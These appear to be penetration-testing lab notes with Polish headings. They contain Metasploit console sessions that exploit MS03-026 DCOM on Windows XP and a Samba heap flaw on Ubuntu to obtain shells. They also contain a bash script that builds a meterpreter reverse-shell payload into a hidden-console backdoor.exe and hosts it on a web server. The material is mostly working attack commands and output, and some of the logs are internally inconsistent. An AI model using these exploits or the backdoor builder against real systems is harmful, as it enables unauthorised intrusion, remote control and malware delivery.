Testy penetracyjne maszyny docelowej z systemem Windows XP SP2

msf  exploit(ms03_026_dcom) > search dcom


Matching Modules
================

   Name            Disclosure Date       Rank    Description
   ----            ---------------       ---     -----------

   exploit/windows
dcerpc/ms03_026_dcom   2003-07-16      great    Microsoft RPC 

exploit/windows/
driver/
broadcom_wifi_ssid     2006-11-11       low    Broadcom Wireless 

exploit/windows/
smb/ms04_031_netdde   2004-10-12       good   Microsoft NetDDE 


msf  exploit(ms03_026_dcom) > use exploit/windows/dcerpc/ms03_026_dcom 

msf  exploit(ms03_026_dcom) >


msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf  exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf  exploit(ms03_026_dcom) >
msf  exploit(ms03_026_dcom) > exploit


[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
===========================================================================


msf  exploit(ms03_026_dcom) > set PAYLOAD windows/adduser 
PAYLOAD => windows/adduser


msf > use exploit/windows/dcerpc/ms03_026_dcom 
msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf  exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf  exploit(ms03_026_dcom) > set PAYLOAD windows/shell/bind_tcp 

PAYLOAD => windows/shell/bind_tcp
msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.56.101:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1052) at 2011-10-31 01:55:42 +0530

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
================================================================
Testy penetracyjne systemu Windows 8

syringe.sh 

export     interface=eth0export     ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')export     port=$(shuf -i 2000-65000 -n 1)   
echo -e "\e[01;32m[>]\e[00m Generating payload..."payload=$(msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=$port LHOST=$ourIP R | msfencode -a x86 e x86/alpha_mixed -t raw BufferRegister=EAX)
echo -e "\e[01;32m[>]\e[00m Creating .exe..."
tar -xvf syringe_files.tar
echo "syringe.exe -3 $payload" > s.bat
echo ";!@Install@!UTF-8!" > config.txt 
echo "GUIMode=\"2\"" >> config.txt
echo "RunProgram=\"hidcon:s.bat\"" >> config.txt
echo ";!@InstallEnd@!" >> config.txt
7z a files.7z s.bat syringe.exe
cat 7zsd.sfx config.txt files.7z> backdoor.exe 
cp backdoor.exe /var/www/
rm config.txt s.bat files.7z 7zsd.sfx syringe.exe
echo -e "\e[01;32m[>]\e[00m Starting Web server..." service apache2 start
echo -e "\e[01;32m[>]\e[00m Backdoor is hosted on http://$ourIP/backdoor.exe"

================================================================

Eksploatacja maszyny docelowej z systemem Linux (Ubuntu)

msf > nmap -sT 192.168.56.101

[*] exec: nmap 192.168.56.101

Starting Nmap 5.20 ( http://nmap.org ) at 2011-11-05 13:35 IST

Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.56.101

Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1) 
|_html-title: Index of /

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME) 

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ )

msf > use exploit/linux/samba/lsa_transnames_heap

msf  exploit(lsa_transnames_heap) > show options
Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall


msf  exploit(lsa_transnames_heap) > set RHOST 192.168.56.101
RHOST => 192.168.56.101

msf  exploit(lsa_transnames_heap) >
msf  exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp 

payload => linux/x86/shell_bind_tcp

msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use

msf  exploit(lsa_transnames_heap) > exploit

[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
==============================================================





